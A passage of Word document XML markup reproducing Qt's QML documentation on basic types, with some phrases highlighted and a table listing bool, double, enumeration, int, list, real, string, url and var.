            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>int</w:t>
        </w:r>
      </w:hyperlink>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refers to a single number,</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId116" w:history="1">
        <w:r w:rsidRPr="00186E45">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:highlight w:val="yellow"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>var</w:t>
        </w:r>
      </w:hyperlink>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can refer to a single list of items)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D815C8" w:rsidRPr="00D815C8" w:rsidRDefault="00D815C8" w:rsidP="00064AC7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="278" w:lineRule="atLeast"/>
        <w:ind w:left="525"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">A value that contains a </w:t>
      </w:r>
      <w:r w:rsidRPr="007874AF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>simple set of property-value pairs</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> (e.g.</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId117" w:history="1">
        <w:r w:rsidRPr="00D815C8">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>size</w:t>
        </w:r>
      </w:hyperlink>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refers to a value with</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>width</w:t>
      </w:r>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and</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>height</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>attributes)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D815C8" w:rsidRPr="00D815C8" w:rsidRDefault="00D815C8" w:rsidP="00FD0330">
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="186" w:name="supported-basic-types"/>
      <w:bookmarkStart w:id="187" w:name="_Toc483000572"/>
      <w:bookmarkStart w:id="188" w:name="_Toc483003593"/>
      <w:bookmarkStart w:id="189" w:name="_Toc483603924"/>
      <w:bookmarkStart w:id="190" w:name="_Toc483605144"/>
      <w:bookmarkEnd w:id="186"/>
      <w:r w:rsidRPr="00FD0330">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Supported Basic Types</w:t>
      </w:r>
      <w:bookmarkEnd w:id="187"/>
      <w:bookmarkEnd w:id="188"/>
      <w:bookmarkEnd w:id="189"/>
      <w:bookmarkEnd w:id="190"/>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Some basic types are </w:t>
      </w:r>
      <w:r w:rsidRPr="00FD0330">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>supported by the engine by default</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidRPr="007874AF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>do not require an</w:t>
      </w:r>
      <w:r w:rsidR="00FD0330">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId118" w:history="1">
        <w:r w:rsidRPr="007874AF">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:highlight w:val="yellow"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>import statement</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00FD0330">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">to be used, while </w:t>
      </w:r>
      <w:r w:rsidRPr="007874AF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>others do require the client to import the module</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> which provides them. All of the basic types listed below </w:t>
      </w:r>
      <w:r w:rsidRPr="007874AF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>may be used as a</w:t>
      </w:r>
      <w:r w:rsidRPr="007874AF">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="007874AF">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>property</w:t>
      </w:r>
      <w:r w:rsidRPr="007874AF">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="007874AF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>type</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> in a QML document, with the following </w:t>
      </w:r>
      <w:r w:rsidRPr="007874AF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>exceptions</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D815C8" w:rsidRPr="00FD0330" w:rsidRDefault="00FD0330" w:rsidP="00064AC7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="278" w:lineRule="atLeast"/>
        <w:ind w:left="525"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FD0330">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>L</w:t>
      </w:r>
      <w:r w:rsidR="00D815C8" w:rsidRPr="00FD0330">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ist</w:t>
      </w:r>
      <w:r w:rsidRPr="00FD0330">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00D815C8" w:rsidRPr="00FD0330">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>must be used in conjunction with a QML object type</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D815C8" w:rsidRPr="00D815C8" w:rsidRDefault="00FD0330" w:rsidP="00064AC7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="278" w:lineRule="atLeast"/>
        <w:ind w:left="525"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FD0330">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>E</w:t>
      </w:r>
      <w:r w:rsidR="00D815C8" w:rsidRPr="00FD0330">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>numeration</w:t>
      </w:r>
      <w:r w:rsidRPr="00FD0330">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00D815C8" w:rsidRPr="00FD0330">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>cannot be used directly as the enumeration must be defined by a registered QML object type</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D815C8" w:rsidRPr="00D815C8" w:rsidRDefault="00D815C8" w:rsidP="00FD0330">
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="191" w:name="basic-types-provided-by-the-qml-language"/>
      <w:bookmarkStart w:id="192" w:name="_Toc483000573"/>
      <w:bookmarkStart w:id="193" w:name="_Toc483003594"/>
      <w:bookmarkStart w:id="194" w:name="_Toc483603925"/>
      <w:bookmarkStart w:id="195" w:name="_Toc483605145"/>
      <w:bookmarkEnd w:id="191"/>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Basic Types Provided By The QML Language</w:t>
      </w:r>
      <w:bookmarkEnd w:id="192"/>
      <w:bookmarkEnd w:id="193"/>
      <w:bookmarkEnd w:id="194"/>
      <w:bookmarkEnd w:id="195"/>
    </w:p>
    <w:p w:rsidR="00D815C8" w:rsidRPr="00D815C8" w:rsidRDefault="00D815C8" w:rsidP="00D815C8">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="24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The basic types </w:t>
      </w:r>
      <w:r w:rsidRPr="007874AF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>supported natively</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> in the QML language are listed below:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="919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794"/>
        <w:gridCol w:w="7401"/>
      </w:tblGrid>
      <w:tr w:rsidR="00D815C8" w:rsidRPr="00D815C8" w:rsidTr="00D815C8">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19" w:history="1">
              <w:r w:rsidR="00D815C8" w:rsidRPr="00D815C8">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:color w:val="17A81A"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                </w:rPr>
                <w:t>bool</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rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D815C8">
              <w:rPr>
                <w:color w:val="404244"/>
              </w:rPr>
              <w:t>Binary true/false value</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20" w:history="1">
              <w:r w:rsidR="00D815C8" w:rsidRPr="00D815C8">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:color w:val="17A81A"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                </w:rPr>
                <w:t>double</w:t>
              </w:r>
            </w:hyperlink>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Number with a decimal point, stored in double precision</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D815C8" w:rsidRPr="00D815C8" w:rsidTr="00D815C8">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7874AF" w:rsidRDefault="00490E7E">
            <w:pPr>
              <w:pStyle w:val="a4"/>
              <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
              <w:textAlignment w:val="baseline"/>
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId121" w:history="1">
              <w:r w:rsidR="00D815C8" w:rsidRPr="007874AF">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:color w:val="FF0000"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                </w:rPr>
                <w:t>enumeration</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rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D815C8">
              <w:rPr>
                <w:color w:val="404244"/>
              </w:rPr>
              <w:t>Named enumeration value</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22" w:history="1">
              <w:r w:rsidR="00D815C8" w:rsidRPr="00D815C8">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:color w:val="17A81A"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                </w:rPr>
                <w:t>int</w:t>
              </w:r>
            </w:hyperlink>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Whole number, e.g. 0, 10, or -20</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D815C8" w:rsidRPr="00D815C8" w:rsidTr="00D815C8">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23" w:history="1">
              <w:r w:rsidR="00D815C8" w:rsidRPr="00D815C8">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:color w:val="17A81A"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                </w:rPr>
                <w:t>list</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rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D815C8">
              <w:rPr>
                <w:color w:val="404244"/>
              </w:rPr>
              <w:t>List of QML objects</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24" w:history="1">
              <w:r w:rsidR="00D815C8" w:rsidRPr="00D815C8">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:color w:val="17A81A"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                </w:rPr>
                <w:t>real</w:t>
              </w:r>
            </w:hyperlink>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Number with a decimal point</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D815C8" w:rsidRPr="00D815C8" w:rsidTr="00D815C8">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25" w:history="1">
              <w:r w:rsidR="00D815C8" w:rsidRPr="00D815C8">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:color w:val="17A81A"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                </w:rPr>
                <w:t>string</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rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D815C8">
              <w:rPr>
                <w:color w:val="404244"/>
              </w:rPr>
              <w:t>Free form text string</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D815C8" w:rsidRPr="00D815C8" w:rsidTr="00D815C8">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26" w:history="1">
              <w:r w:rsidR="00D815C8" w:rsidRPr="00D815C8">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:color w:val="17A81A"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                </w:rPr>
                <w:t>url</w:t>
              </w:r>
            </w:hyperlink>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rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D815C8">
              <w:rPr>
                <w:color w:val="404244"/>
              </w:rPr>
              <w:t>Resource locator</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D815C8" w:rsidRPr="00D815C8" w:rsidTr="00D815C8">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FD0330" w:rsidRDefault="00490E7E">
            <w:pPr>
              <w:pStyle w:val="a4"/>
              <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="374" w:lineRule="atLeast"/>
              <w:textAlignment w:val="baseline"/>
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId127" w:history="1">
              <w:r w:rsidR="00D815C8" w:rsidRPr="00FD0330">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:color w:val="00B050"/>
                  <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
                </w:rPr>
                <w:t>var</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rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D815C8">
              <w:rPr>
                <w:color w:val="404244"/>
              </w:rPr>
              <w:t>Generic property type</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00D815C8" w:rsidRPr="00D815C8" w:rsidRDefault="00D815C8" w:rsidP="00FD0330">
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="196" w:name="basic-types-provided-by-qml-modules"/>
      <w:bookmarkStart w:id="197" w:name="_Toc483000574"/>
      <w:bookmarkStart w:id="198" w:name="_Toc483003595"/>
      <w:bookmarkStart w:id="199" w:name="_Toc483603926"/>
      <w:bookmarkStart w:id="200" w:name="_Toc483605146"/>
      <w:bookmarkEnd w:id="196"/>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Basic Types Provided </w:t>
      </w:r>
      <w:r w:rsidRPr="00FD0330">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>By QML Modules</w:t>
      </w:r>
      <w:bookmarkEnd w:id="197"/>
      <w:bookmarkEnd w:id="198"/>
      <w:bookmarkEnd w:id="199"/>
      <w:bookmarkEnd w:id="200"/>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QML modules may extend the QML language with more basic types. For example, the basic types provided by the</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="007874AF">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>QtQuick</w:t>
      </w:r>
      <w:r w:rsidRPr="007874AF">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="007874AF">
